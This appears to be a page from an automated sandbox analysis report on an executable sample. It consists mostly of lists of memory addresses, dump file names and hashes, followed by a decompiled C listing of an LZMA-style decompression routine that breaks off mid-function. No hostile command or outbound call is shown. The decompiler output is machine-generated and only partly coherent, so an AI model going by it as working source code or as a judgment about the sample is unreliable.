                  0x00000000
                  0x00000000
                  0x00406675
                  0x00406675
                  0x00406678
                  0x0040667a
                  0x0040667b
                  0x0040667e
                  0x00406680
                  0x00406681
                  0x00406683
                  0x00406686
                  0x0040668b
                  0x00406690
                  0x00406699
                  0x004066ac
                  0x004066af
                  0x004066bb
                  0x004066e3
                  0x004066e5
                  0x004066f3
                  0x004066f3
                  0x004066f7
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004066e7
                  0x004066e7
                  0x004066ea
                  0x004066eb
                  0x004066eb
                  0x00000000
                  0x004066e7
                  0x004066bd
                  0x004066c1
                  0x004066c6
                  0x004066c6
                  0x004066cf
                  0x004066d7
                  0x004066da
                  0x00000000
                  0x004066e0
                  0x004066e0
                  0x00000000
                  0x004066e0
                  0x00000000
                  0x004066fd
                  0x004066fd
                  0x00406701
                  0x00406fad
                  0x00406fad
                  0x00000000
                  0x00406fad
                  0x00406707
                  0x0040670a
                  0x0040671a
                  0x0040671d
                  0x00406720
                  0x00406720
                  0x00406720
                  0x00406723
                  0x00406727
                  0x00000000
                  0x00000000
                  0x00406729
                  0x00406729
                  0x0040672f
                  0x00406759
                  0x0040675f
                  0x00406766
                  0x00000000
                  0x00406766
                  0x00406731
                  0x00406735
                  0x00406738
                  0x0040673d
                  0x0040673d
                  0x00406748
                  0x00406750
                  0x00406753
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406798
                  0x0040679e
                  0x004067a1
                  0x004067ae
                  0x004067b6
                  0x00000000
                  0x00000000
                  0x0040676d
                  0x0040676d
                  0x00406771
                  0x00406fbc
                  0x00406fbc
                  0x00000000
                  0x00406fbc
                  0x00406777
                  0x0040677d
                  0x00406788
                  0x00406788
                  0x00406788
                  0x0040678b
                  0x0040678e
                  0x00406791
                  0x00406796
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406e2d
                  0x00406e2d
                  0x00406e33
                  0x00406e39
                  0x00406e3f
                  0x00406e59
                  0x00406e5c
                  0x00406e62
                  0x00406e6d
                  0x00406e6d
                  0x00406e6f
                  0x00406e41
                  0x00406e41
                  0x00406e50
                  0x00406e54
                  0x00406e54
                  0x00406e79
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406e7b
                  0x00406e7f
                  0x0040702e
                  0x0040702e
                  0x00000000
                  0x0040702e
                  0x00406e85
                  0x00406e8b
                  0x00406e92
                  0x00406e9a
                  0x00406e9d
                  0x00406ea0
                  0x00406ea0
                  0x00406ea6
                  0x00406ea6
                  0x00000000
                  0x00000000
                  0x004067be
                  0x004067be
                  0x004067c0
                  0x004067c3
                  0x00406834
                  0x00406834
                  0x00406837
                  0x0040683a
                  0x00406841
                  0x0040684b
                  0x00000000
                  0x0040684b
                  0x004067c5
                  0x004067c5
                  0x004067c9
                  0x004067cc
                  0x004067ce
                  0x004067d1
                  0x004067d4
                  0x004067d6
                  0x004067d9
                  0x004067db
                  0x004067e0
                  0x004067e3
                  0x004067e6
                  0x004067ea
                  0x004067f1
                  0x004067f4
                  0x004067fb
                  0x004067ff
                  0x00406807
                  0x00406807
                  0x00406807
                  0x00406801
                  0x00406801
                  0x00406801
                  0x004067f6
                  0x004067f6
                  0x004067f6
                  0x0040680b
                  0x0040680e
                  0x0040682c
                  0x0040682c
                  0x0040682e
                  0x00000000
                  0x00406810
                  0x00406810
                  0x00406810
                  0x00406813
                  0x00406816
                  0x00406819
                  0x0040681b
                  0x0040681b
                  0x0040681b
                  0x0040681e
                  0x00406821
                  0x00406823
                  0x00406824
                  0x00406827
                  0x00000000
                  0x00406827
                  0x00000000
                  0x00406a5d
                  0x00406a5d
                  0x00406a61
                  0x00406a7f
                  0x00406a7f
                  0x00406a82
                  0x00406a89
                  0x00406a8c
                  0x00406a8f
                  0x00406a92
                  0x00406a95
                  0x00406a98
                  0x00406a9a
                  0x00406aa1
                  0x00406aa2
                  0x00406aa4
                  0x00406aa7
                  0x00406aaa
                  0x00406aad
                  0x00406aad
                  0x00406ab2
                  0x00000000
                  0x00406ab2
                  0x00406a63
                  0x00406a63
                  0x00406a66
                  0x00406a69
                  0x00406a73
                  0x00000000
                  0x00000000
                  0x00406ac7
                  0x00406ac7
                  0x00406acb
                  0x00406aee
                  0x00406af1
                  0x00406af4
                  0x00406afe
                  0x00406acd
                  0x00406acd
                  0x00406ad0
                  0x00406ad3
                  0x00406ad6
                  0x00406ae3
                  0x00406ae6
                  0x00406ae6
                  0x00000000
                  0x00000000
                  0x00406b0a
                  0x00406b0a
                  0x00406b0e
                  0x00000000
                  0x00000000
                  0x00406b14
                  0x00406b14
                  0x00406b18
                  0x00000000
                  0x00000000
                  0x00406b1e
                  0x00406b1e
                  0x00406b20
                  0x00406b24
                  0x00406b24
                  0x00406b27
                  0x00406b2b
                  0x00000000
                  0x00000000
                  0x00406b7b
                  0x00406b7b
                  0x00406b7f
                  0x00406b86
                  0x00406b86
                  0x00406b89
                  0x00406b8c
                  0x00406b96
                  0x00000000
                  0x00406b96
                  0x00406b81
                  0x00406b81
                  0x00000000
                  0x00000000
                  0x00406ba2
                  0x00406ba2
                  0x00406ba6
                  0x00406bad
                  0x00406bb0
                  0x00406bb3
                  0x00406ba8
                  0x00406ba8
                  0x00406ba8
                  0x00406bb6
                  0x00406bb9
                  0x00406bbc
                  0x00406bbc
                  0x00406bbf
                  0x00406bc2
                  0x00406bc5
                  0x00406bc5
                  0x00406bc8
                  0x00406bcf
                  0x00406bd4
                  0x00000000
                  0x00000000
                  0x00406c62
                  0x00406c62
                  0x00406c66
                  0x00407004
                  0x00407004
                  0x00000000
                  0x00407004
                  0x00406c6c
                  0x00406c6c
                  0x00406c6f
                  0x00406c72
                  0x00406c76
                  0x00406c79
                  0x00406c7f
                  0x00406c81
                  0x00406c81
                  0x00406c81
                  0x00406c84
                  0x00406c87
                  0x00000000
                  0x00000000
                  0x00406857
                  0x00406857
                  0x0040685b
                  0x00406fc8
                  0x00406fc8
                  0x00000000
                  0x00406fc8
                  0x00406861
                  0x00406861
                  0x00406864
                  0x00406867
                  0x0040686b
                  0x0040686e
                  0x00406874
                  0x00406876
                  0x00406876
                  0x00406876
                  0x00406879
                  0x0040687c
                  0x0040687c
                  0x0040687f
                  0x00406882
                  0x00000000
                  0x00000000
                  0x00406888
                  0x00406888
                  0x0040688e
                  0x00000000
                  0x00000000
                  0x00406894
                  0x00406894
                  0x00406898
                  0x0040689b
                  0x0040689e
                  0x004068a1
                  0x004068a4
                  0x004068a5
                  0x004068a8
                  0x004068aa
                  0x004068b0
                  0x004068b3
                  0x004068b6
                  0x004068b9
                  0x004068bc
                  0x004068bf
                  0x004068c2
                  0x004068de
                  0x004068e1
                  0x004068e4
                  0x004068e7
                  0x004068ee
                  0x004068f2
                  0x004068f4
                  0x004068f8
                  0x004068c4
                  0x004068c4
                  0x004068c8
                  0x004068d0
                  0x004068d5
                  0x004068d7
                  0x004068d9
                  0x004068d9
                  0x004068fb
                  0x00406902
                  0x00406905
                  0x00000000
                  0x0040690b
                  0x0040690b
                  0x00000000
                  0x0040690b
                  0x00000000
                  0x00406910
                  0x00406910
                  0x00406914
                  0x00406fd4
                  0x00406fd4
                  0x00000000
                  0x00406fd4
                  0x0040691a
                  0x0040691a
                  0x0040691d
                  0x00406920
                  0x00406924
                  0x00406927
                  0x0040692d
                  0x0040692f
                  0x0040692f
                  0x0040692f
                  0x00406932
                  0x00406935
                  0x00406935
                  0x00406935
                  0x0040693b
                  0x00000000
                  0x00000000
                  0x0040693d
                  0x0040693d
                  0x00406940
                  0x00406943
                  0x00406946
                  0x00406949
                  0x0040694c
                  0x0040694f
                  0x00406952
                  0x00406955
                  0x00406958
                  0x0040695b
                  0x00406973
                  0x00406976
                  0x00406979
                  0x0040697c
                  0x0040697c
                  0x0040697f
                  0x00406983
                  0x00406985
                  0x0040695d
                  0x0040695d
                  0x00406965
                  0x0040696a
                  0x0040696c
                  0x0040696e
                  0x0040696e
                  0x00406988
                  0x0040698f
                  0x00406992
                  0x00000000
                  0x00406994
                  0x00406994
                  0x00000000
                  0x00406994
                  0x00406992
                  0x00406999
                  0x00406999
                  0x00406999
                  0x00406999
                  0x00000000
                  0x00000000
                  0x004069d4
                  0x004069d4
                  0x004069d8
                  0x00406fe0
                  0x00406fe0
                  0x00000000
                  0x00406fe0
                  0x004069de
                  0x004069de
                  0x004069e1
                  0x004069e4
                  0x004069e8
                  0x004069eb
                  0x004069f1
                  0x004069f3
                  0x004069f3
                  0x004069f3
                  0x004069f6
                  0x004069f9
                  0x004069f9
                  0x004069ff
                  0x0040699d
                  0x0040699d
                  0x004069a0
                  0x00000000
                  0x004069a0
                  0x00406a01
                  0x00406a01
                  0x00406a04
                  0x00406a07
                  0x00406a0a
                  0x00406a0d
                  0x00406a10
                  0x00406a13
                  0x00406a16
                  0x00406a19
                  0x00406a1c
                  0x00406a1f
                  0x00406a37
                  0x00406a3a
                  0x00406a3d
                  0x00406a40
                  0x00406a40
                  0x00406a43
                  0x00406a47
                  0x00406a49
                  0x00406a21
                  0x00406a21
                  0x00406a29
                  0x00406a2e
                  0x00406a30
                  0x00406a32
                  0x00406a32
                  0x00406a4c
                  0x00406a53
                  0x00406a56
                  0x00000000
                  0x00406a58
                  0x00406a58
                  0x00000000
                  0x00406a58
                  0x00000000
                  0x00406ce5
                  0x00406ce5
                  0x00406ce9
                  0x00407010
                  0x00407010
                  0x00000000
                  0x00407010
                  0x00406cef
                  0x00406cef
                  0x00406cf2
                  0x00406cf5
                  0x00406cf9
                  0x00406cfc
                  0x00406d02
                  0x00406d04
                  0x00406d04
                  0x00406d04
                  0x00406d07
                  0x00000000
                  0x00000000
                  0x00406ab5
                  0x00406ab5
                  0x00406ab8
                  0x00000000
                  0x00000000
                  0x00406df4
                  0x00406df4
                  0x00406df8
                  0x00406e1a
                  0x00406e1a
                  0x00406e1d
                  0x00406e27
                  0x00406e2a
                  0x00406e2a
                  0x00000000
                  0x00406e2a
                  0x00406dfa
                  0x00406dfa
                  0x00406dfd
                  0x00406e01
                  0x00406e04
                  0x00406e04
                  0x00406e07
                  0x00000000
                  0x00000000
                  0x00406eb1
                  0x00406eb1
                  0x00406eb5
                  0x00406ed3
                  0x00406ed3
                  0x00406ed3
                  0x00406ed3
                  0x00406eda
                  0x00406ee1
                  0x00406ee8
                  0x00406ee8
                  0x00406eef
                  0x00406ef2
                  0x00406ef9
                  0x00000000
                  0x00406efc
                  0x00406eb7
                  0x00406eb7
                  0x00406eba
                  0x00406ebd
                  0x00406ec0
                  0x00406ec7
                  0x00406e0b
                  0x00406e0b
                  0x00406e0e
                  0x00000000
                  0x00000000
                  0x00406fa2
                  0x00406fa2
                  0x00406fa5
                  0x00406ea6
                  0x00406ea6
                  0x00406ea6
                  0x00000000
                  0x00406eac
                  0x00000000
                  0x00406bdc
                  0x00406bdc
                  0x00406bde
                  0x00406be5
                  0x00406be6
                  0x00406be8
                  0x00406beb
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406eef
                  0x00406eef
                  0x00406ef2
                  0x00406ef9
                  0x00000000
                  0x00406efc
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406c21
                  0x00406c21
                  0x00406c24
                  0x00406c5a
                  0x00406c5a
                  0x00406d8a
                  0x00406d8a
                  0x00406d8a
                  0x00406d8a
                  0x00406d8d
                  0x00406d8d
                  0x00406d90
                  0x00406d92
                  0x0040701c
                  0x0040701c
                  0x00000000
                  0x0040701c
                  0x00406d98
                  0x00406d98
                  0x00406d9b
                  0x00000000
                  0x00000000
                  0x00406da1
                  0x00406da1
                  0x00406da5
                  0x00406da8
                  0x00406da8
                  0x00406da8
                  0x00000000
                  0x00406da8
                  0x00406c26
                  0x00406c26
                  0x00406c28
                  0x00406c2a
                  0x00406c2c
                  0x00406c2f
                  0x00406c30
                  0x00406c32
                  0x00406c34
                  0x00406c37
                  0x00406c3a
                  0x00406c50
                  0x00406c50
                  0x00406c55
                  0x00406c8d
                  0x00406c8d
                  0x00406c91
                  0x00406cba
                  0x00406cbd
                  0x00406cbf
                  0x00406cc6
                  0x00406cc9
                  0x00406ccc
                  0x00406ccc
                  0x00406cd1
                  0x00406cd1
                  0x00406cd3
                  0x00406cd6
                  0x00406cdd
                  0x00406ce0
                  0x00406d0d
                  0x00406d0d
                  0x00406d10
                  0x00406d13
                  0x00406d87
                  0x00406d87
                  0x00406d87
                  0x00406d87
                  0x00000000
                  0x00406d87
                  0x00406d15
                  0x00406d15
                  0x00406d1b
                  0x00406d1e
                  0x00406d21
                  0x00406d24
                  0x00406d27
                  0x00406d2a
                  0x00406d2d
                  0x00406d30
                  0x00406d33
                  0x00406d36
                  0x00406d4f
                  0x00406d51
                  0x00406d54
                  0x00406d55
                  0x00406d58
                  0x00406d5a
                  0x00406d5d
                  0x00406d5f
                  0x00406d61
                  0x00406d64
                  0x00406d66
                  0x00406d69
                  0x00406d6d
                  0x00406d6f
                  0x00406d6f
                  0x00406d70
                  0x00406d73
                  0x00406d76
                  0x00406d38
                  0x00406d38
                  0x00406d40
                  0x00406d45
                  0x00406d47
                  0x00406d4a
                  0x00406d4a
                  0x00406d79
                  0x00406d80
                  0x00406d0a
                  0x00406d0a
                  0x00406d0a
                  0x00406d0a
                  0x00000000
                  0x00406d82
                  0x00406d82
                  0x00000000
                  0x00406d82
                  0x00406d80
                  0x00406c93
                  0x00406c93
                  0x00406c96
                  0x00406c98
                  0x00406c9b
                  0x00406c9e
                  0x00406ca1
                  0x00406ca3
                  0x00406ca6
                  0x00406ca9
                  0x00406ca9
                  0x00406cac
                  0x00406cac
                  0x00406caf
                  0x00406cb6
                  0x00406c8a
                  0x00406c8a
                  0x00406c8a
                  0x00406c8a
                  0x00000000
                  0x00406cb8
                  0x00406cb8
                  0x00000000
                  0x00406cb8
                  0x00406cb6
                  0x00406c3c
                  0x00406c3c
                  0x00406c3f
                  0x00406c41
                  0x00406c44
                  0x00000000
                  0x00000000
                  0x004069a3
                  0x004069a3
                  0x004069a7
                  0x00406fec
                  0x00406fec
                  0x00000000
                  0x00406fec
                  0x004069ad
                  0x004069ad
                  0x004069b0
                  0x004069b3
                  0x004069b6
                  0x004069b9
                  0x004069bc
                  0x004069bf
                  0x004069c1
                  0x004069c4
                  0x004069c7
                  0x004069ca
                  0x004069cc
                  0x004069cc
                  0x004069cc
                  0x00000000
                  0x00000000
                  0x00406b2e
                  0x00406b2e
                  0x00406b32
                  0x00406ff8
                  0x00406ff8
                  0x00000000
                  0x00406ff8
                  0x00406b38
                  0x00406b38
                  0x00406b3b
                  0x00406b3e
                  0x00406b41
                  0x00406b43
                  0x00406b43
                  0x00406b43
                  0x00406b46
                  0x00406b49
                  0x00406b4c
                  0x00406b4f
                  0x00406b52
                  0x00406b55
                  0x00406b56
                  0x00406b58
                  0x00406b58
                  0x00406b58
                  0x00406b5b
                  0x00406b5e
                  0x00406b61
                  0x00406b64
                  0x00406b64
                  0x00406b64
                  0x00406b67
                  0x00406b69
                  0x00406b69
                  0x00000000
                  0x00000000
                  0x00406dab
                  0x00406dab
                  0x00406dab
                  0x00406daf
                  0x00000000
                  0x00000000
                  0x00406db5
                  0x00406db5
                  0x00406db8
                  0x00406dbb
                  0x00406dbe
                  0x00406dc0
                  0x00406dc0
                  0x00406dc0
                  0x00406dc3
                  0x00406dc6
                  0x00406dc9
                  0x00406dcc
                  0x00406dcf
                  0x00406dd2
                  0x00406dd3
                  0x00406dd5
                  0x00406dd5
                  0x00406dd5
                  0x00406dd8
                  0x00406ddb
                  0x00406dde
                  0x00406de1
                  0x00406de4
                  0x00406de8
                  0x00406dea
                  0x00406ded
                  0x00000000
                  0x00406def
                  0x00406def
                  0x00406b6c
                  0x00406b6c
                  0x00000000
                  0x00406b6c
                  0x00406ded
                  0x00407022
                  0x00407022
                  0x00000000
                  0x00000000
                  0x00406651
                  0x00407059
                  0x00407059
                  0x00000000
                  0x00407059
                  0x00406ea6
                  0x00406f26
                  0x00406eef

                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 126d375e0cd8dd3c96d9f56c9c2b4ea3570e5546f357d91bfce8ff404d349699
                  • Instruction ID: 2508fafb39113fa530b835c7ee7350b0f579aeff726ee83cf5aef614fa8a9c48
                  • Opcode Fuzzy Hash: 126d375e0cd8dd3c96d9f56c9c2b4ea3570e5546f357d91bfce8ff404d349699
                  • Instruction Fuzzy Hash: A3A14271E00229CBDB28CFA8C8547ADBBB1FF44305F15816AD856BB281C7786A96DF44
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00406DF4, Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                  Download Yara Rule
                  C-Code - Quality: 98%
                  			E00406DF4() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407061))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
